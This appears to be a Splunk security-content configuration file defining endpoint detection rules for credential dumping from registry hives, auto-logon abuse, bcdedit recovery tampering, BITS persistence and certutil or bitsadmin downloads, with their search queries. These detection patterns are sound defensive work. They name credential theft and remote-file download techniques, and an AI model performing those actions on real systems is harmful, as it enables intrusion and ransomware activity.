action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Attempted Credential Dump From Registry via Reg exe - Rule action.correlationsearch.annotations = {"analytic_story": ["Industroyer2", "Windows Registry Abuse", "Credential Dumping", "CISA AA23-347A", "DarkSide Ransomware", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Monitor for execution of reg.exe with parameters specifying an export of keys that contain hashed credentials that attackers may try to crack offline. action.notable.param.rule_title = Attempted Credential Dump From Registry via Reg exe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=reg* OR Processes.process_name=cmd* Processes.process=*save* (Processes.process=*HKEY_LOCAL_MACHINE\\Security* OR Processes.process=*HKEY_LOCAL_MACHINE\\SAM* OR Processes.process=*HKEY_LOCAL_MACHINE\\System* OR Processes.process=*HKLM\\Security* OR Processes.process=*HKLM\\System* OR Processes.process=*HKLM\\SAM*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `attempted_credential_dump_from_registry_via_reg_exe_filter` [ESCU - Auto Admin Logon Registry Entry - Rule] action.escu = 0 action.escu.enabled = 1 description = this search is to detect a suspicious registry modification to implement auto admin logon to a host. This technique was seen in BlackMatter ransomware to automatically logon to the compromise host after triggering a safemode boot to continue encrypting the whole network. This behavior is not a common practice and really a suspicious TTP or alert need to be consider if found within then network premise. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.002", "T1552"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = this search is to detect a suspicious registry modification to implement auto admin logon to a host. This technique was seen in BlackMatter ransomware to automatically logon to the compromise host after triggering a safemode boot to continue encrypting the whole network. This behavior is not a common practice and really a suspicious TTP or alert need to be consider if found within then network premise. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-11 action.escu.modification_date = 2023-04-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Auto Admin Logon Registry Entry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackMatter Ransomware", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = modified registry key $registry_key_name$ with registry value $registry_value_name$ to prepare autoadminlogon action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Auto Admin Logon Registry Entry - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackMatter Ransomware", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.002", "T1552"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this search is to detect a suspicious registry modification to implement auto admin logon to a host. This technique was seen in BlackMatter ransomware to automatically logon to the compromise host after triggering a safemode boot to continue encrypting the whole network. This behavior is not a common practice and really a suspicious TTP or alert need to be consider if found within then network premise. action.notable.param.rule_title = Auto Admin Logon Registry Entry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*" AND Registry.registry_value_name=AutoAdminLogon AND Registry.registry_value_data=1) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `auto_admin_logon_registry_entry_filter` [ESCU - Batch File Write to System32 - Rule] action.escu = 0 action.escu.enabled = 1 description = The search looks for a batch file (.bat) written to the Windows system directory tree. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204", "T1204.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for a batch file (.bat) written to the Windows system directory tree. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product. action.escu.known_false_positives = It is possible for this search to generate a notable event for a batch file write to a path that includes the string "system32", but is not the actual Windows system directory. As such, you should confirm the path of the batch file identified by the search. In addition, a false positive may be generated by an administrator copying a legitimate batch file in this directory tree. You should confirm that the activity is legitimate and modify the search to add exclusions, as necessary. action.escu.creation_date = 2023-4-11 action.escu.modification_date = 2023-4-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Batch File Write to System32 - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["SamSam Ransomware"] action.risk = 1 action.risk.param._risk_message = A file - $file_name$ was written to system32 has occurred on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "file_name", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Batch File Write to System32 - Rule action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204", "T1204.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for a batch file (.bat) written to the Windows system directory tree. action.notable.param.rule_title = Batch File Write to System32 action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=* by _time span=1h Processes.process_guid Processes.process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | join process_guid [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*\\system32\\*", "*\\syswow64\\*") Filesystem.file_name="*.bat" by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid | `drop_dm_object_name(Filesystem)`] | table dest user file_create_time, file_name, file_path, process_name, firstTime, lastTime | dedup file_create_time | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `batch_file_write_to_system32_filter` [ESCU - Bcdedit Command Back To Normal Mode Boot - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious bcdedit commandline to configure the host from safe mode back to normal boot configuration. This technique was seen in blackMatter ransomware where it force the compromised host to boot in safe mode to continue its encryption and bring back to normal boot using bcdedit deletevalue command. This TTP can be a good alert for host that booted from safe mode forcefully since it need to modify the boot configuration to bring it back to normal. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious bcdedit commandline to configure the host from safe mode back to normal boot configuration. This technique was seen in blackMatter ransomware where it force the compromised host to boot in safe mode to continue its encryption and bring back to normal boot using bcdedit deletevalue command. This TTP can be a good alert for host that booted from safe mode forcefully since it need to modify the boot configuration to bring it back to normal. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-06 action.escu.modification_date = 2021-09-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Bcdedit Command Back To Normal Mode Boot - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackMatter Ransomware"] action.risk = 1 action.risk.param._risk_message = bcdedit process with commandline $process$ to bring back to normal boot configuration the $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Bcdedit Command Back To Normal Mode Boot - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackMatter Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious bcdedit commandline to configure the host from safe mode back to normal boot configuration. This technique was seen in blackMatter ransomware where it force the compromised host to boot in safe mode to continue its encryption and bring back to normal boot using bcdedit deletevalue command. This TTP can be a good alert for host that booted from safe mode forcefully since it need to modify the boot configuration to bring it back to normal. action.notable.param.rule_title = Bcdedit Command Back To Normal Mode Boot action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe Processes.process="*/deletevalue*" Processes.process="*{current}*" Processes.process="*safeboot*" by Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.user |`drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bcdedit_command_back_to_normal_mode_boot_filter` [ESCU - BCDEdit Failure Recovery Modification - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for flags passed to bcdedit.exe modifications to the built-in Windows error recovery boot configurations. This is typically used by ransomware to prevent recovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for flags passed to bcdedit.exe modifications to the built-in Windows error recovery boot configurations. This is typically used by ransomware to prevent recovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may modify the boot configuration. action.escu.creation_date = 2020-12-21 action.escu.modification_date = 2020-12-21 action.escu.confidence = high action.escu.full_search_name = ESCU - BCDEdit Failure Recovery Modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ryuk Ransomware", "Ransomware"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting disable the ability to recover the endpoint. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - BCDEdit Failure Recovery Modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Ryuk Ransomware", "Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for flags passed to bcdedit.exe modifications to the built-in Windows error recovery boot configurations. This is typically used by ransomware to prevent recovery. action.notable.param.rule_title = BCDEdit Failure Recovery Modification action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe Processes.process="*recoveryenabled*" (Processes.process="* no*") by Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bcdedit_failure_recovery_modification_filter` [ESCU - BITS Job Persistence - Rule] action.escu = 0 action.escu.enabled = 1 description = The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` scheduling a BITS job to persist on an endpoint. The query identifies the parameters used to create, resume or add a file to a BITS job. Typically seen combined in a oneliner or ran in sequence. If identified, review the BITS job created and capture any files written to disk. It is possible for BITS to be used to upload files and this may require further network data analysis to identify. You can use `bitsadmin /list /verbose` to list out the jobs during investigation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1197"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` scheduling a BITS job to persist on an endpoint. The query identifies the parameters used to create, resume or add a file to a BITS job. Typically seen combined in a oneliner or ran in sequence. If identified, review the BITS job created and capture any files written to disk. It is possible for BITS to be used to upload files and this may require further network data analysis to identify. You can use `bitsadmin /list /verbose` to list out the jobs during investigation. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives will be present. Typically, applications will use `BitsAdmin.exe`. Any filtering should be done based on command-line arguments (legitimate applications) or parent process. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - BITS Job Persistence - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BITS Jobs", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to persist using BITS. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - BITS Job Persistence - Rule action.correlationsearch.annotations = {"analytic_story": ["BITS Jobs", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1197"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` scheduling a BITS job to persist on an endpoint. The query identifies the parameters used to create, resume or add a file to a BITS job. Typically seen combined in a oneliner or ran in sequence. If identified, review the BITS job created and capture any files written to disk. It is possible for BITS to be used to upload files and this may require further network data analysis to identify. You can use `bitsadmin /list /verbose` to list out the jobs during investigation. action.notable.param.rule_title = BITS Job Persistence action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process IN (*create*, *addfile*, *setnotifyflags*, *setnotifycmdline*, *setminretrydelay*, *setcustomheaders*, *resume* ) by Processes.dest Processes.user Processes.original_file_name Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bits_job_persistence_filter` [ESCU - BITSAdmin Download File - Rule] action.escu = 0 action.escu.enabled = 1 description = The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` using the `transfer` parameter to download a remote object. In addition, look for `download` or `upload` on the command-line, the switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically once executed, a follow on command will be used to execute the dropped file. Note that the network connection or file modification events related will not spawn or create from `bitsadmin.exe`, but the artifacts will appear in a parallel process of `svchost.exe` with a command-line similar to `svchost.exe -k netsvcs -s BITS`. It's important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use `bitsadmin /list /verbose` to list out the jobs during investigation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation", "Command and Control"], "mitre_attack": ["T1197", "T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` using the `transfer` parameter to download a remote object. In addition, look for `download` or `upload` on the command-line, the switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically once executed, a follow on command will be used to execute the dropped file. Note that the network connection or file modification events related will not spawn or create from `bitsadmin.exe`, but the artifacts will appear in a parallel process of `svchost.exe` with a command-line similar to `svchost.exe -k netsvcs -s BITS`. It's important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use `bitsadmin /list /verbose` to list out the jobs during investigation. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives, however it may be required to filter based on parent process name or network connection. action.escu.creation_date = 2022-11-29 action.escu.modification_date = 2022-11-29 action.escu.confidence = high action.escu.full_search_name = ESCU - BITSAdmin Download File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ingress Tool Transfer", "BITS Jobs", "DarkSide Ransomware", "Living Off The Land", "Flax Typhoon"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to download a file. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - BITSAdmin Download File - Rule action.correlationsearch.annotations = {"analytic_story": ["Ingress Tool Transfer", "BITS Jobs", "DarkSide Ransomware", "Living Off The Land", "Flax Typhoon"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation", "Installation", "Command and Control"], "mitre_attack": ["T1197", "T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` using the `transfer` parameter to download a remote object. In addition, look for `download` or `upload` on the command-line, the switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically once executed, a follow on command will be used to execute the dropped file. Note that the network connection or file modification events related will not spawn or create from `bitsadmin.exe`, but the artifacts will appear in a parallel process of `svchost.exe` with a command-line similar to `svchost.exe -k netsvcs -s BITS`. It's important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use `bitsadmin /list /verbose` to list out the jobs during investigation. action.notable.param.rule_title = BITSAdmin Download File action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process IN ("*transfer*", "*addfile*") by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bitsadmin_download_file_filter` [ESCU - CertUtil Download With URLCache and Split Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = Certutil.exe may download a file from a remote destination using `-urlcache`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. However, it is uncommon for `certutil.exe` to write files to world writeable paths.\ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Certutil.exe may download a file from a remote destination using `-urlcache`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. However, it is uncommon for `certutil.exe` to write files to world writeable paths.\ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives in most environments, however tune as needed based on parent-child relationship or network connection. action.escu.creation_date = 2022-02-03 action.escu.modification_date = 2022-02-03 action.escu.confidence = high action.escu.full_search_name = ESCU - CertUtil Download With URLCache and Split Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ingress Tool Transfer", "DarkSide Ransomware", "Living Off The Land", "ProxyNotShell", "CISA AA22-277A", "Flax Typhoon", "Forest Blizzard"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to download a file. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 90}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - CertUtil Download With URLCache and Split Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["Ingress Tool Transfer", "DarkSide Ransomware", "Living Off The Land", "ProxyNotShell", "CISA AA22-277A", "Flax Typhoon", "Forest Blizzard"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Certutil.exe may download a file from a remote destination using `-urlcache`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. However, it is uncommon for `certutil.exe` to write files to world writeable paths.\ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. action.notable.param.rule_title = CertUtil Download With URLCache and Split Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*urlcache* Processes.process=*split*) OR Processes.process=*urlcache* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.original_file_name Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_download_with_urlcache_and_split_arguments_filter` [ESCU - CertUtil Download With VerifyCtl and Split Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = Certutil.exe may download a file from a remote destination using `-VerifyCtl`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. \ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using `-VerifyCtl`, the file will either be written to the current working directory or `%APPDATA%\..\LocalLow\Microsoft\CryptnetUrlCache\Content\`. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Certutil.exe may download a file from a remote destination using `-VerifyCtl`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. \ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using `-VerifyCtl`, the file will either be written to the current working directory or `%APPDATA%\..\LocalLow\Microsoft\CryptnetUrlCache\Content\`. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the 